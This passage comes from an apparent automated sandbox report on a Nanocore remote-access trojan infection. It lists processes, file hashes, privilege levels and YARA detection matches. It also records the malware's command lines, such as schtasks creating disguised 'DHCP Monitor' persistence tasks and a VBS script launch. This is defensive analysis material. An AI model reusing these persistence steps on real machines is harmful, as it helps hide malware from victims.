                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 46%, ReversingLabs
                                                  Reputation:low

                                                  General

                                                  Target ID:3
                                                  Start time:08:10:05
                                                  Start date:02/02/2023
                                                  Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  Imagebase:0xe80000
                                                  File size:45152 bytes
                                                  MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                  Antivirus matches:
                                                  • Detection: 0%, ReversingLabs
                                                  Reputation:high

                                                  General

                                                  Target ID:4
                                                  Start time:08:10:12
                                                  Start date:02/02/2023
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp
                                                  Imagebase:0x2c0000
                                                  File size:185856 bytes
                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:5
                                                  Start time:08:10:12
                                                  Start date:02/02/2023
                                                  Path:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
                                                  Imagebase:0x310000
                                                  File size:936754 bytes
                                                  MD5 hash:8A57722EC9067FAAA9FF2980C5F02838
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000005.00000003.451151702.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  Reputation:low

                                                  General

                                                  Target ID:6
                                                  Start time:08:10:13
                                                  Start date:02/02/2023
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7fcd70000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:7
                                                  Start time:08:10:13
                                                  Start date:02/02/2023
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp8D34.tmp
                                                  Imagebase:0x2c0000
                                                  File size:185856 bytes
                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:8
                                                  Start time:08:10:13
                                                  Start date:02/02/2023
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7fcd70000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  General

                                                  Target ID:9
                                                  Start time:08:10:14
                                                  Start date:02/02/2023
                                                  Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0
                                                  Imagebase:0xc60000
                                                  File size:45152 bytes
                                                  MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET

                                                  General

                                                  Target ID:10
                                                  Start time:08:10:15
                                                  Start date:02/02/2023
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7fcd70000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  General

                                                  Target ID:11
                                                  Start time:08:10:15
                                                  Start date:02/02/2023
                                                  Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0
                                                  Imagebase:0x400000
                                                  File size:45152 bytes
                                                  MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Antivirus matches:
                                                  • Detection: 0%, ReversingLabs

                                                  General

                                                  Target ID:12
                                                  Start time:08:10:15
                                                  Start date:02/02/2023
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7fcd70000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  General

                                                  Target ID:13
                                                  Start time:08:10:21
                                                  Start date:02/02/2023
                                                  Path:C:\Windows\System32\wscript.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs"
                                                  Imagebase:0x7ff60c2e0000
                                                  File size:163840 bytes
                                                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language

                                                  General

                                                  Target ID:16
                                                  Start time:08:10:24
                                                  Start date:02/02/2023
                                                  Path:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
                                                  Imagebase:0x310000
                                                  File size:936754 bytes
                                                  MD5 hash:8A57722EC9067FAAA9FF2980C5F02838
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

                                                  General

                                                  Target ID:17
                                                  Start time:08:10:33
                                                  Start date:02/02/2023
                                                  Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe"
                                                  Imagebase:0x840000
                                                  File size:45152 bytes
                                                  MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:.Net C# or VB.NET

                                                  General

                                                  Target ID:18
                                                  Start time:08:10:33
                                                  Start date:02/02/2023
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7fcd70000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language

                                                  General

                                                  Target ID:19
                                                  Start time:08:10:34
                                                  Start date:02/02/2023
                                                  Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  Imagebase:0x910000
                                                  File size:45152 bytes
                                                  MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Author: unknown

                                                  General

                                                  Target ID:20
                                                  Start time:08:10:40
                                                  Start date:02/02/2023
                                                  Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  Imagebase:0x9c0000
                                                  File size:45152 bytes
                                                  MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:.Net C# or VB.NET

                                                  General

                                                  Target ID:21
                                                  Start time:08:10:41
                                                  Start date:02/02/2023
                                                  Path:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
                                                  Imagebase:0x310000
                                                  File size:936754 bytes
                                                  MD5 hash:8A57722EC9067FAAA9FF2980C5F02838
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
